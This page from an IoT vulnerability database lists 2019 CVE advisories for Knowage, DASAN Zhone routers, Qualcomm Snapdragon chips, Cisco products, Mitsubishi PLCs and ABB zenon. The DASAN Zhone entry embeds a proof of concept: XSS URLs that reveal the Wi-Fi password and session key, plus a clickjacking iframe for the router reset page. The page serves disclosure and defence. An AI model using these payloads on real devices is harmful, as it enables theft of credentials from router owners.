VARIoT IoT vulnerabilities database

Affected products: vendor, model and version
CWE format is 'CWE-number'. Threat type can be: remote or local
Look up free text in title and description

VAR-201909-0676 CVE-2019-13349 Knowage Vulnerabilities related to certificate and password management CVSS V2: 4.0
CVSS V3: 4.9
Severity: MEDIUM
In Knowage through 6.1.1, an authenticated user that accesses the users page will obtain all user password hashes. Knowage Contains vulnerabilities related to certificate and password management.Information may be obtained
VAR-201909-0690 CVE-2019-13190 Knowage Authentication vulnerability CVSS V2: 5.0
CVSS V3: 5.3
Severity: MEDIUM
In Knowage through 6.1.1, the sign up page does not invalidate a valid CAPTCHA token. This allows for CAPTCHA bypass in the signup page. Knowage Contains an authentication vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state
VAR-201909-1467 CVE-2019-10677 DASAN Zhone ZNID GPON 2426A EU Cross-Site Scripting Vulnerability CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
Multiple Cross-Site Scripting (XSS) issues in the web interface on DASAN Zhone ZNID GPON 2426A EU version S3.1.285 devices allow a remote attacker to execute arbitrary JavaScript via manipulation of an unsanitized GET parameter: /zhndnsdisplay.cmd (name), /wlsecrefresh.wl (wlWscCfgMethod, wl_wsc_reg). DASAN Zhone ZNID GPON 2426A EU The device contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. DASAN Zhone ZNID GPON 2426A EU is a wireless router from DASAN Korea. The vulnerability stems from the lack of proper validation of client data for web applications. An attacker could exploit the vulnerability to execute client code. # Exploit Title: Multiple Cross-Site Scripting (XSS) in DASAN Zhone ZNID GPON 2426A EU # Date: 31.03.2019 # Exploit Author: Adam Ziaja https://adamziaja.com https://redteam.pl # Vendor Homepage: https://dasanzhone.com # Version: <= S3.1.285 # Alternate Version: <= S3.0.738 # Tested on: version S3.1.285 (alternate version S3.0.738) # CVE : CVE-2019-10677 = Reflected Cross-Site Scripting (XSS) = http://192.168.1.1/zhndnsdisplay.cmd?fileKey=&name=%3Cscript%3Ealert(1)%3C/script%3E&interface=eth0.v1685.ppp = Stored Cross-Site Scripting (XSS) = * WiFi network plaintext password http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=%27;alert(wpaPskKey);// http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(wpaPskKey);// * CSRF token http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(sessionKey);// = Clickjacking = <html><body><iframe src="http://192.168.1.1/resetrouter.html"></iframe></body></html>
VAR-201909-1428 CVE-2019-10497 plural Snapdragon Vulnerability in using freed memory in products CVSS V2: 4.6
CVSS V3: 7.8
Severity: HIGH
Use after free issue occurs If another instance of open for voice_svc node has been called from application without closing the previous one. in Snapdragon Auto, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in MDM9150, MDM9206, MDM9607, MDM9640, MDM9650, MSM8909W, MSM8996AU, QCS605, Qualcomm 215, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 439 / SD 429, SD 450, SD 615/16/SD 415, SD 625, SD 632, SD 636, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 820, SD 820A, SD 835, SD 845 / SD 850, SD 855, SDA660, SDM439, SDM630, SDM660, SDX20, SDX24. plural Snapdragon The product contains a vulnerability related to the use of released memory.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Qualcomm MDM9206 and others are products of Qualcomm (Qualcomm). MDM9206 is a central processing unit (CPU) product. MDM9607 is a central processing unit (CPU) product. SDX24 is a modem. A resource management error vulnerability exists in Audio in several Qualcomm products. This vulnerability stems from improper management of system resources (such as memory, disk space, files, etc.) by network systems or products
VAR-201909-1457 CVE-2019-10506 plural Snapdragon Vulnerability related to input validation in products CVSS V2: 4.6
CVSS V3: 7.8
Severity: HIGH
While processing QCA_NL80211_VENDOR_SUBCMD_AVOID_FREQUENCY vendor command, driver does not validate the data obtained from the user space which could be invalid and thus leads to an undesired behaviour in Snapdragon Auto, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile in MDM9206, MDM9607, MSM8996AU, QCA6174A, QCA6574AU, QCA9377, QCA9379, QCS605, SD 600, SD 625, SD 636, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 820, SD 820A, SD 835, SD 845 / SD 850, SD 855, SDM630, SDM660, SDX24. plural Snapdragon The product contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Qualcomm MDM9206 and others are products of Qualcomm (Qualcomm). MDM9206 is a central processing unit (CPU) product. MDM9607 is a central processing unit (CPU) product. SDX24 is a modem. An input validation error vulnerability exists in WLAN in several Qualcomm products. The vulnerability stems from the failure of the network system or product to properly validate the input data
VAR-201909-1458 CVE-2019-10507 plural Snapdragon Product out-of-bounds vulnerability CVSS V2: 4.6
CVSS V3: 7.8
Severity: HIGH
Lack of check of extscan change results received from firmware can lead to an out of buffer read in Snapdragon Auto, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music in MDM9150, MDM9206, MDM9607, MDM9640, MDM9650, MSM8996AU, QCA6174A, QCA6574AU, QCA9377, QCA9379, QCS605, SD 210/SD 212/SD 205, SD 425, SD 430, SD 600, SD 625, SD 636, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 820A, SD 835, SD 845 / SD 850, SD 855, SDA660, SDM630, SDM660, SDX20, SDX24. plural Snapdragon The product contains an out-of-bounds vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Qualcomm MDM9206 and others are products of Qualcomm (Qualcomm). MDM9206 is a central processing unit (CPU) product. MDM9607 is a central processing unit (CPU) product. SDX24 is a modem. A buffer error vulnerability exists in WLAN in several Qualcomm products. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. Attackers can exploit this vulnerability to cause buffer overflow or heap overflow, etc
VAR-201909-1123 CVE-2019-2284 plural Snapdragon Vulnerability in using freed memory in products CVSS V2: 4.4
CVSS V3: 7.0
Severity: HIGH
Possible use-after-free issue due to a race condition while calling camera ioctl concurrently in Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in MSM8909W, QCS405, QCS605, Qualcomm 215, SD 425, SD 439 / SD 429, SD 450, SD 625, SD 632, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 845 / SD 850, SD 855, SDM439, SDX24. plural Snapdragon The product contains a vulnerability related to the use of released memory.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. SD 712 is a central processing unit (CPU) product. SD 710 is a central processing unit (CPU) product. SDX24 is a modem. A resource management error vulnerability exists in the Camera in several Qualcomm products. This vulnerability stems from improper management of system resources (such as memory, disk space, files, etc.) by network systems or products
VAR-201909-0986 CVE-2019-2333 plural Snapdragon Classic buffer overflow vulnerability in products CVSS V2: 4.6
CVSS V3: 7.8
Severity: HIGH
Buffer overflow due to improper validation of buffer size while IPA driver processing to perform read operation in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in MDM9150, MDM9607, MDM9650, MSM8909W, MSM8996AU, QCS605, Qualcomm 215, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 439 / SD 429, SD 450, SD 625, SD 632, SD 636, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 820, SD 820A, SD 835, SD 845 / SD 850, SD 855, SDA660, SDM439, SDM630, SDM660, SDX20, SDX24. plural Snapdragon The product contains a classic buffer overflow vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Qualcomm MDM9607 and others are products of Qualcomm (Qualcomm). MDM9607 is a central processing unit (CPU) product. MDM9650 is a central processing unit (CPU) product. SDX24 is a modem. A buffer error vulnerability exists in the IPA driver in several Qualcomm products. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. Attackers can exploit this vulnerability to cause buffer overflow or heap overflow, etc
VAR-201909-0987 CVE-2019-2341 plural Snapdragon Classic buffer overflow vulnerability in products CVSS V2: 4.6
CVSS V3: 7.8
Severity: HIGH
Buffer overflow when the audio buffer size provided by user is larger than the maximum allowable audio buffer size. in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in MDM9150, MDM9206, MDM9607, MDM9640, MDM9650, MSM8909W, MSM8996AU, QCS405, QCS605, Qualcomm 215, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 439 / SD 429, SD 450, SD 615/16/SD 415, SD 625, SD 632, SD 636, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 820, SD 820A, SD 835, SD 845 / SD 850, SD 855, SDA660, SDM439, SDM630, SDM660, SDX20, SDX24. plural Snapdragon The product contains a classic buffer overflow vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state
VAR-201909-0985 CVE-2019-1976 Cisco Industrial Network Director Vulnerabilities related to certificate and password management CVSS V2: 5.0
CVSS V3: 9.8
Severity: CRITICAL
A vulnerability in the &ldquo;plug-and-play&rdquo; services component of Cisco Industrial Network Director (IND) could allow an unauthenticated, remote attacker to access sensitive information on an affected device. The vulnerability is due to improper access restrictions on the web-based management interface. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to access running configuration information about devices managed by the IND, including administrative credentials. Cisco Industrial Network Director (IND) is an industrial automation management system from Cisco. The system is automated through the visualization of industrial Ethernet infrastructure
VAR-201909-0206 CVE-2019-12633 Cisco Unified Contact Center Express Input validation vulnerability CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
A vulnerability in Cisco Unified Contact Center Express (Unified CCX) could allow an unauthenticated, remote attacker to bypass access controls and conduct a server-side request forgery (SSRF) attack on a targeted system. The vulnerability is due to improper validation of user-supplied input on the affected system. An attacker could exploit this vulnerability by sending the user of the web application a crafted request. If the request is processed, the attacker could access the system and perform unauthorized actions. This component supports functions such as self-service voice service, call distribution, and customer access control. A code issue vulnerability exists in Cisco Unified CCX releases prior to 11.6(2)ES04 and releases prior to 12.0(1)SU0.1
VAR-201909-0154 CVE-2019-12645 Cisco Jabber Client Framework Input validation vulnerability CVSS V2: 7.2
CVSS V3: 7.8
Severity: HIGH
A vulnerability in Cisco Jabber Client Framework (JCF) for Mac Software, installed as part of the Cisco Jabber for Mac client, could allow an authenticated, local attacker to execute arbitrary code on an affected device The vulnerability is due to improper file level permissions on an affected device when it is running Cisco JCF for Mac Software. An attacker could exploit this vulnerability by authenticating to the affected device and executing arbitrary code or potentially modifying certain configuration files. A successful exploit could allow the attacker to execute arbitrary code or modify certain configuration files on the device using the privileges of the installed Cisco JCF for Mac Software. Cisco Jabber Client Framework (JCF) Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Cisco Jabber Client Framework (JCF) is a set of unified communication client framework of Cisco (Cisco). The framework provides online status display, instant messaging, voice and other functions. An input validation error vulnerability exists in Cisco JCF 12.6(1) and earlier versions based on the Mac platform. The vulnerability is caused by the program assigning incorrect permissions to files
VAR-201909-0207 CVE-2019-12635 Cisco Content Security Management Appliance Software Authorization vulnerability CVSS V2: 3.5
CVSS V3: 4.3
Severity: MEDIUM
A vulnerability in the authorization module of Cisco Content Security Management Appliance (SMA) Software could allow an authenticated, remote attacker to gain out-of-scope access to email. The vulnerability exists because the affected software does not correctly implement role permission controls. An attacker could exploit this vulnerability by using a custom role with specific permissions. A successful exploit could allow the attacker to access the spam quarantine of other users. This appliance is mainly used to manage all policies, reports, audit information, etc. of email and web security appliances
VAR-201909-0205 CVE-2019-12632 Cisco Finesse Input validation vulnerability CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
A vulnerability in Cisco Finesse could allow an unauthenticated, remote attacker to bypass access controls and conduct a server-side request forgery (SSRF) attack on an affected system. The vulnerability exists because the affected system does not properly validate user-supplied input. An attacker could exploit this vulnerability by sending a crafted request to a user of the web application. A successful exploit could allow the attacker to access the system and perform unauthorized actions. Cisco Finesse Contains an input validation vulnerability.Information may be tampered with. Cisco Finesse is a set of call center management software developed by Cisco
VAR-201909-0153 CVE-2019-12644 Cisco Identity Services Engine Software Vulnerable to cross-site scripting CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. The vulnerability exists because the web-based management interface of the affected device does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information
VAR-201909-1561 No CVE Denial of Service Vulnerability in MITSUBISHI PLC (CNVD-2019-30336) CVSS V2: 6.1
CVSS V3: -
Severity: MEDIUM
MITSUBISHI PLC is a programmable controller product of Japan's Mitsubishi Electric. MITSUBISHI PLC has a denial of service vulnerability that could be exploited by an attacker to cause a denial of service
VAR-201909-1563 No CVE MITSUBISHI PLC has a denial of service vulnerability CVSS V2: 6.1
CVSS V3: -
Severity: MEDIUM
MITSUBISHI PLC is a programmable controller product of Japan's Mitsubishi Electric (Mitsubishi Electric) company. MITSUBISHI PLC has a denial of service vulnerability, which can be exploited by attackers to cause a denial of service
VAR-201909-1562 No CVE MITSUBISHI PLC has a denial of service vulnerability (CNVD-2019-30335) CVSS V2: 6.1
CVSS V3: -
Severity: MEDIUM
MITSUBISHI PLC is a programmable controller product of Japan's Mitsubishi Electric (Mitsubishi Electric) company. MITSUBISHI PLC has a denial of service vulnerability, which can be exploited by attackers to cause a denial of service
VAR-201909-1545 No CVE ABB zenon Editor has dll hijacking vulnerability CVSS V2: 7.2
CVSS V3: -
Severity: HIGH
The ABB Group ranks among the world's top 500 companies and is headquartered in Zurich, Switzerland, dedicated to providing solutions for customers in the industrial and power industries. ABB zenon Editor has a dll hijacking vulnerability that can be used by attackers to gain server permissions
VAR-201911-1433 CVE-2019-2258 plural Snapdragon Vulnerability related to array index verification in products CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
Improper validation of array index causes OOB write and then leads to memory corruption in MMCP in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in MDM9150, MDM9607, MDM9615, MDM9625, MDM9635M, MDM9640, MDM9650, MDM9655, MSM8909W, MSM8996AU, QCS605, Qualcomm 215, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 439 / SD 429, SD 450, SD 615/16/SD 415, SD 625, SD 632, SD 636, SD 650/52, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 820, SD 820A, SD 835, SD 845 / SD 850, SD 855, SD 8CX, SDA660, SDM439, SDM630, SDM660, SDX20, Snapdragon_High_Med_2016, SXR1130. plural Snapdragon The product contains a vulnerability related to array index validation.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Qualcomm MDM9607, etc. are all products of Qualcomm. MDM9607 is a central processing unit (CPU) product. Qualcomm MDM9150 is a central processing unit (CPU) product. SDX20 is a modem. MMCP in many Qualcomm products has an input validation error vulnerability. The vulnerability stems from the fact that the network system or product did not correctly verify the input data, and there is currently no detailed vulnerability details provided